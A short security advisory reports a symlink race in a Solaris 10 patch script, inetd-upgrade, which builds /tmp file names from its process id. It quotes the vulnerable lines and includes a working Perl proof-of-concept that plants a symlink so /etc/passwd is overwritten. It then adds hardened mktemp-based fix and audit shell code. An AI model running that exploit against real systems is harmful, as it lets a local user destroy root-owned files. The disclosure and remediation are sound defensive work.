Larry W. Cashdollar

Predictable temp file names built from the process id in the Solaris 10 patch cluster for SPARC:

patches/137097-01/SUNWcsr/reloc/lib/svc/method/inetd-upgrade

lines:

72 inetdconf_entries_file=/tmp/iconf_entries.$$
73
74 # Create sed script that prints out inetd.conf src line from inetconv generated
75 # manifest.
76 cat <<EOF > /tmp/inetd-upgrade.$$.sed
77 /propval name='source_line'/{
78 n
79 s/'//g
80 p
81 }
82 /from the inetd.conf(4) format line/{
83 n
84 p
85 }
86 EOF

If 137097-01 is applied and changes need to be made to the inetd.conf file, a malicious user can overwrite the contents of a root-owned file with a simple script:

#!/usr/bin/perl
# Root-owned file whose contents get clobbered by the script's write.
$clobber = "/etc/passwd";

# Poll the process list until inetd-upgrade appears.
while (1) {
    open ps, "ps -ef | grep -v grep | grep -v PID |";

    while (<ps>) {
        # ps -ef columns are UID PID PPID ...; $args[1] is the PID.
        @args = split " ", $_;

        if (/inetd-upgrade/) {
            # Plant the predictable /tmp/iconf_entries.<pid> name as a symlink.
            print "Symlinking iconf_entries.$args[1] to $clobber\n";
            symlink($clobber, "/tmp/iconf_entries.$args[1]");
            exit(1);
        }
    }

    close ps;
}
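The fix for this class of bug is to stop building /tmp names from the PID. The following is an added example, not Sun's patch code or part of the original advisory: it shows the hardened counterpart to lines 72 and 76 of inetd-upgrade (a private mktemp(1) work directory plus a write helper that refuses symlinks) and a small audit function that flags the predictable `/tmp/...$$` pattern in a script. It assumes mktemp(1) supports `-d` with a template.

```shell
#!/bin/sh
# Hardened replacement for the /tmp/iconf_entries.$$ and /tmp/inetd-upgrade.$$.sed
# lines of inetd-upgrade (added example, not the patch's own code).

# Create a private, unpredictable, mode-0700 work directory. Every temp file
# lives inside it, so knowing the PID no longer lets anyone pre-create the name.
make_workdir() {
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/inetd-upgrade.XXXXXX") || return 1
    printf '%s\n' "$workdir"
}

# Write stdin to $1, but refuse if the path already exists as a symlink or as
# anything other than a regular file, so a planted link cannot redirect the write.
safe_write() {
    target=$1
    if [ -L "$target" ] || { [ -e "$target" ] && [ ! -f "$target" ]; }; then
        printf 'refusing to write through %s\n' "$target" >&2
        return 1
    fi
    cat > "$target"
}

# Audit helper: print (with line numbers) every line of script $1 that builds a
# /tmp name from $$, the exact pattern seen in inetd-upgrade. Returns 0 when
# at least one such line exists, 1 when the script is clean.
find_pid_tmpfiles() {
    grep -n '/tmp/[^ ]*\$\$' "$1"
}

# Usage sketch for the upgrade script itself:
#   wd=$(make_workdir) || exit 1
#   inetdconf_entries_file=$wd/iconf_entries
#   safe_write "$wd/inetd-upgrade.sed" <<EOF
#   ...sed program...
#   EOF
```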